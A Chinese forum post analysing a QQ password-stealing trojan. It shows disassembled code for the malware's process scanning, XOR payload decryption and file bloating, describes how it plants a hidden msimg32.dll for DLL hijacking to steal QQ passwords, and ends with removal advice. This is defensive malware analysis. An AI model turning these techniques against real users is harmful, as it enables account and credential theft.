拿到这个样本时,他的名字叫"29.exe",拿起PEID查之,UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay],是个压缩壳,然后在看下他有没有附加数据,用Stud_PE查之,如果有,看来是木马生成器生成的!
OK.OD载入,ESP定律,迅速到达OEP!
00402310 6A 00 push 0
00402312 FF15 18204000 call near dword ptr ds:[402018] ; kernel32.GetModuleHandleA
00402318 A3 A4364000 mov dword ptr ds:[4036A4], eax ; 29.00400000
0040231D FF15 14204000 call near dword ptr ds:[402014] ; kernel32.GetCommandLineA
00402323 6A 0A push 0A
00402325 A3 A0364000 mov dword ptr ds:[4036A0], eax ; 29.00400000
0040232A 50 push eax ; 29.00400000
0040232B A1 A4364000 mov eax, dword ptr ds:[4036A4]
00402330 6A 00 push 0
00402332 50 push eax ; 29.00400000
00402333 E8 58000000 call 00402390
代码层次比较多,一个个写的话会比较乱,所以就贴一起主要地方:
00402390 83EC 64 sub esp, 64 ; 分配一部分局部空间
00402393 B0 69 mov al, 69
00402395 53 push ebx
00402396 B3 64 mov bl, 64
00402398 884424 10 mov byte ptr ss:[esp+10], al
0040239C 884424 14 mov byte ptr ss:[esp+14], al
004023A0 884424 18 mov byte ptr ss:[esp+18], al
004023A4 B8 30000000 mov eax, 30
004023A9 885C24 0F mov byte ptr ss:[esp+F], bl
004023AD 885C24 15 mov byte ptr ss:[esp+15], bl
004023B1 56 push esi ; 29.00402340
004023B2 8B7424 70 mov esi, dword ptr ss:[esp+70] ; 模块句柄 0400000
004023B6 33DB xor ebx, ebx
004023B8 884424 0D mov byte ptr ss:[esp+D], al
004023BC 884424 0B mov byte ptr ss:[esp+B], al
004023C0 894424 3C mov dword ptr ss:[esp+3C], eax
004023C4 B2 54 mov dl, 54
004023C6 B1 6F mov cl, 6F
004023C8 8D4424 10 lea eax, dword ptr ss:[esp+10]
004023CC 68 007F0000 push 7F00
004023D1 53 push ebx
004023D2 885424 18 mov byte ptr ss:[esp+18], dl ; 下面其实是把字符串一个一个写入局部地址,病毒常用伎俩
004023D6 C64424 19 58 mov byte ptr ss:[esp+19], 58
004023DB C64424 1A 47 mov byte ptr ss:[esp+1A], 47
004023E0 C64424 1D 46 mov byte ptr ss:[esp+1D], 46
004023E5 884C24 25 mov byte ptr ss:[esp+25], cl
004023E9 884C24 1E mov byte ptr ss:[esp+1E], cl
004023ED C64424 1F 75 mov byte ptr ss:[esp+1F], 75
004023F2 C64424 22 61 mov byte ptr ss:[esp+22], 61
004023F7 C64424 23 74 mov byte ptr ss:[esp+23], 74
004023FC C64424 26 6E mov byte ptr ss:[esp+26], 6E
00402401 885C24 27 mov byte ptr ss:[esp+27], bl
00402405 885424 10 mov byte ptr ss:[esp+10], dl
00402409 C64424 11 4D mov byte ptr ss:[esp+11], 4D
0040240E C64424 12 32 mov byte ptr ss:[esp+12], 32
00402413 C64424 14 31 mov byte ptr ss:[esp+14], 31
00402418 885C24 16 mov byte ptr ss:[esp+16], bl
0040241C C74424 48 03000>mov dword ptr ss:[esp+48], 3
00402424 C74424 4C 40234>mov dword ptr ss:[esp+4C], 402340 ; 窗口回调地址,去该地址上下断
0040242C 895C24 50 mov dword ptr ss:[esp+50], ebx
00402430 895C24 54 mov dword ptr ss:[esp+54], ebx
00402434 897424 58 mov dword ptr ss:[esp+58], esi ; 29.00402340
00402438 C74424 64 10000>mov dword ptr ss:[esp+64], 10
00402440 895C24 68 mov dword ptr ss:[esp+68], ebx
00402444 894424 6C mov dword ptr ss:[esp+6C], eax
00402448 FF15 CC204000 call near dword ptr ds:[4020CC] ; USER32.LoadIconA
0040244E 68 007F0000 push 7F00
00402453 53 push ebx
00402454 894424 5C mov dword ptr ss:[esp+5C], eax
00402458 894424 70 mov dword ptr ss:[esp+70], eax
0040245C FF15 D0204000 call near dword ptr ds:[4020D0] ; USER32.LoadCursorA
00402462 8D4C24 3C lea ecx, dword ptr ss:[esp+3C]
00402466 51 push ecx
00402467 894424 5C mov dword ptr ss:[esp+5C], eax
0040246B FF15 D4204000 call near dword ptr ds:[4020D4] ; USER32.RegisterClassExA
00402471 53 push ebx
00402472 56 push esi ; 29.00402340
00402473 53 push ebx
00402474 53 push ebx
00402475 68 00000080 push 80000000
0040247A 68 00000080 push 80000000
0040247F 68 00000080 push 80000000
00402484 68 00000080 push 80000000
00402489 8D5424 28 lea edx, dword ptr ss:[esp+28]
0040248D 68 0000CF00 push 0CF0000
00402492 8D4424 34 lea eax, dword ptr ss:[esp+34]
00402496 52 push edx
00402497 50 push eax
00402498 53 push ebx
00402499 FF15 D8204000 call near dword ptr ds:[4020D8] ; CreateWindowExA 这条运行后,会下断在窗口回调上
00402340 8B4424 08 mov eax, dword ptr ss:[esp+8] ; 窗口回调首地址
00402344 83F8 02 cmp eax, 2
00402347 75 0D jnz short 00402356 ; 29.00402356
00402349 6A 00 push 0
0040234B FF15 F0204000 call near dword ptr ds:[4020F0] ; USER32.PostQuitMessage
00402351 33C0 xor eax, eax
00402353 C2 1000 retn 10
00402356 83F8 01 cmp eax, 1
00402359 75 0D jnz short 00402368 ; 29.00402368
0040235B E8 90040000 call 004027F0 ; 进这里
00402360 6A 00 push 0
00402362 FF15 10204000 call near dword ptr ds:[402010] ; kernel32.ExitProcess
00402368 8B4C24 10 mov ecx, dword ptr ss:[esp+10]
0040236C 8B5424 0C mov edx, dword ptr ss:[esp+C] ; USER32.77D18734
00402370 51 push ecx
00402371 52 push edx
00402372 50 push eax
00402373 8B4424 10 mov eax, dword ptr ss:[esp+10]
00402377 50 push eax
00402378 FF15 F4204000 call near dword ptr ds:[4020F4] ; USER32.DefWindowProcA
0040237E C2 1000 retn 10
004027F0 E8 0BFEFFFF call 00402600 ; 这个CALL 判断病毒是否已经运行
004027F5 E8 26000000 call 00402820 ; 29.00402820
004027FA E8 C1FFFFFF call 004027C0 ; 29.004027C0
004027FF A1 98364000 mov eax, dword ptr ds:[403698]
00402804 50 push eax
00402805 FF15 C4204000 call near dword ptr ds:[4020C4] ; USER32.CloseWindow
0040280B E8 60FEFFFF call 00402670 ; 29.00402670
00402810 6A 00 push 0
00402812 FF15 10204000 call near dword ptr ds:[402010] ; kernel32.ExitProcess
其中:qq.exe 进程名的比较方式也是一个字节一个字节的比较的
004010E0 81EC 50010000 sub esp, 150
004010E6 53 push ebx
004010E7 55 push ebp
004010E8 56 push esi ; 29.00402340
004010E9 57 push edi
004010EA 33C0 xor eax, eax
004010EC B9 49000000 mov ecx, 49
004010F1 8D7C24 3C lea edi, dword ptr ss:[esp+3C]
004010F5 50 push eax
004010F6 F3:AB rep stos dword ptr es:[edi]
004010F8 6A 02 push 2
004010FA C74424 40 28010>mov dword ptr ss:[esp+40], 128
00401102 E8 CB170000 call 004028D2 ; jmp 到 kernel32.CreateToolhelp32Snapshot
00401107 8BE8 mov ebp, eax
00401109 83FD FF cmp ebp, -1
0040110C 75 0D jnz short 0040111B ; 29.0040111B
0040110E 5F pop edi ; 0012F838
0040110F 5E pop esi ; 0012F838
00401110 5D pop ebp ; 0012F838
00401111 33C0 xor eax, eax
00401113 5B pop ebx ; 0012F838
00401114 81C4 50010000 add esp, 150
0040111A C3 retn
0040111B 8D4424 38 lea eax, dword ptr ss:[esp+38]
0040111F 50 push eax
00401120 55 push ebp
00401121 E8 B8170000 call 004028DE ; jmp 到 kernel32.Process32First
00401126 85C0 test eax, eax
00401128 75 0B jnz short 00401135 ; 29.00401135
0040112A 5F pop edi ; 0012F838
0040112B 5E pop esi ; 0012F838
0040112C 5D pop ebp ; 0012F838
0040112D 5B pop ebx ; 0012F838
0040112E 81C4 50010000 add esp, 150
00401134 C3 retn
00401135 B9 0A000000 mov ecx, 0A
0040113A 33C0 xor eax, eax
0040113C 8D7C24 10 lea edi, dword ptr ss:[esp+10]
00401140 8D5424 10 lea edx, dword ptr ss:[esp+10]
00401144 F3:AB rep stos dword ptr es:[edi]
00401146 8D7C24 5C lea edi, dword ptr ss:[esp+5C]
0040114A 83C9 FF or ecx, FFFFFFFF
0040114D F2:AE repne scas byte ptr es:[edi]
0040114F F7D1 not ecx
00401151 2BF9 sub edi, ecx
00401153 8BC1 mov eax, ecx
00401155 8BF7 mov esi, edi
00401157 8BFA mov edi, edx
00401159 C1E9 02 shr ecx, 2
0040115C F3:A5 rep movs dword ptr es:[edi], dword p>
0040115E 8BC8 mov ecx, eax
00401160 83E1 03 and ecx, 3
00401163 F3:A4 rep movs byte ptr es:[edi], byte ptr>
00401165 8A4C24 10 mov cl, byte ptr ss:[esp+10]
00401169 8A5424 13 mov dl, byte ptr ss:[esp+13]
0040116D 8A4424 11 mov al, byte ptr ss:[esp+11]
00401171 80F9 51 cmp cl, 51
00401174 74 05 je short 0040117B ; 29.0040117B
00401176 80F9 71 cmp cl, 71
00401179 75 35 jnz short 004011B0 ; 29.004011B0
0040117B 3C 51 cmp al, 51
0040117D 74 04 je short 00401183 ; 29.00401183
0040117F 3C 71 cmp al, 71
00401181 75 2D jnz short 004011B0 ; 29.004011B0
00401183 807C24 12 2E cmp byte ptr ss:[esp+12], 2E
00401188 75 26 jnz short 004011B0 ; 29.004011B0
0040118A 8A5C24 14 mov bl, byte ptr ss:[esp+14]
0040118E 80FB 58 cmp bl, 58
00401191 74 05 je short 00401198 ; 29.00401198
00401193 80FB 78 cmp bl, 78
00401196 75 18 jnz short 004011B0 ; 29.004011B0
00401198 80FA 45 cmp dl, 45
0040119B 74 05 je short 004011A2 ; 29.004011A2
0040119D 80FA 65 cmp dl, 65
004011A0 75 0E jnz short 004011B0 ; 29.004011B0
004011A2 8A5C24 15 mov bl, byte ptr ss:[esp+15]
004011A6 80FB 45 cmp bl, 45
004011A9 74 5E je short 00401209 ; 29.00401209
004011AB 80FB 65 cmp bl, 65
004011AE 74 59 je short 00401209 ; 29.00401209
004011B0 3C 4D cmp al, 4D
004011B2 74 04 je short 004011B8 ; 29.004011B8
004011B4 3C 6D cmp al, 6D
004011B6 75 33 jnz short 004011EB ; 29.004011EB
004011B8 807C24 12 2E cmp byte ptr ss:[esp+12], 2E
004011BD 75 2C jnz short 004011EB ; 29.004011EB
004011BF 80FA 45 cmp dl, 45
004011C2 74 05 je short 004011C9 ; 29.004011C9
004011C4 80FA 65 cmp dl, 65
004011C7 75 22 jnz short 004011EB ; 29.004011EB
004011C9 8A4424 14 mov al, byte ptr ss:[esp+14]
004011CD 3C 58 cmp al, 58
004011CF 74 04 je short 004011D5 ; 29.004011D5
004011D1 3C 78 cmp al, 78
004011D3 75 16 jnz short 004011EB ; 29.004011EB
004011D5 8A4424 15 mov al, byte ptr ss:[esp+15]
004011D9 3C 45 cmp al, 45
004011DB 74 04 je short 004011E1 ; 29.004011E1
004011DD 3C 65 cmp al, 65
004011DF 75 0A jnz short 004011EB ; 29.004011EB
004011E1 80F9 54 cmp cl, 54
004011E4 74 23 je short 00401209 ; 29.00401209
004011E6 80F9 74 cmp cl, 74
004011E9 74 1E je short 00401209 ; 29.00401209
004011EB 8D4C24 38 lea ecx, dword ptr ss:[esp+38]
004011EF 51 push ecx
004011F0 55 push ebp
004011F1 E8 E2160000 call 004028D8 ; jmp 到 kernel32.Process32Next
004011F6 85C0 test eax, eax
004011F8 ^ 0F85 37FFFFFF jnz 00401135 ; 29.00401135
004011FE 5F pop edi ; 0012F838
004011FF 5E pop esi ; 0012F838
00401200 5D pop ebp ; 0012F838
00401201 5B pop ebx ; 0012F838
00401202 81C4 50010000 add esp, 150
00401208 C3 retn
004016CD 56 push esi
004016CE 68 38214000 push 402138 ; ASCII "QQ2010"
004016D3 E8 08FDFFFF call 004013E0 ; 通过注册表查找QQ路径,找到路径之后在查找其目录下的tssafeedit.dat文件是否存在
判断msimg32.dll文件是否存在,存在就说明病毒已经运行过了,如果不存在就创建一个,看名称就知道是准备用DLL 劫持技术了!
然后删除AutoLogin.dat文件,看名称就可以猜到这是QQ自动登录用的文件
然后判断"C:\Program Files\Tencent\QQ\Users\All Users\QQ\Registry.db"文件是否存在,如果存在的话就会执行下面的代码
00401BE1 8D4C24 2C lea ecx, dword ptr ss:[esp+2C]
00401BE5 51 push ecx ; ntdll.7C92F641
00401BE6 E8 65FCFFFF call 00401850 ; 29.00401850
00401BEB 8B15 A4364000 mov edx, dword ptr ds:[4036A4] ; 29.00400000
00401BF1 81C2 18960100 add edx, 19618
00401BF7 52 push edx ; ntdll.KiFastSystemCallRet
00401BF8 E8 93000000 call 00401C90 ; 打开自己 读入附加数据
00401C0A 8A1C30 mov bl, byte ptr ds:[eax+esi]
00401C0D 80F3 73 xor bl, 73
00401C10 881C30 mov byte ptr ds:[eax+esi], bl
00401C13 40 inc eax
00401C14 3D 87850000 cmp eax, 8587
00401C19 ^ 72 EF jb short 00401C0A ; 解密一个放在数据段另一个PE 文件
00401C44 51 push ecx ; MSVCRT.77BFC2E3
00401C45 68 87850000 push 8587
00401C4A 50 push eax
00401C4B 56 push esi ; 29.0041108C
00401C4C E8 2F160000 call 00403280 ; 解密一个放在数据段另一个PE 文件(第二层)
00401C51 8B15 B4364000 mov edx, dword ptr ds:[4036B4]
00401C57 81C2 1C110000 add edx, 111C
00401C5D 52 push edx
00401C5E E8 CDFAFFFF call 00401730 ; 然后在偏移111C 处将读取出来的附加数据覆盖上去
00401C63 A1 B8364000 mov eax, dword ptr ds:[4036B8]
00401C68 8B0D B4364000 mov ecx, dword ptr ds:[4036B4]
00401C6E 50 push eax
00401C6F 8D9424 30010000 lea edx, dword ptr ss:[esp+130]
00401C76 51 push ecx
00401C77 52 push edx
00401C78 E8 E3FAFFFF call 00401760 ; 这里就是增肥了,随机生成一些字节,循环写入N 次,放在文件尾,可以直接咔嚓掉
[ATTACH]57983[/ATTACH]
[ATTACH]57984[/ATTACH]
[ATTACH]57985[/ATTACH]
然后退出,自删除,等QQ运行后加载msimg32.dll之后盗取QQ密码!
楼下分析msimg32(重点),该木马只需要删除msimg32.dll就等于清除了木马,该文件被隐藏,请用XUETR等工具删除!
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课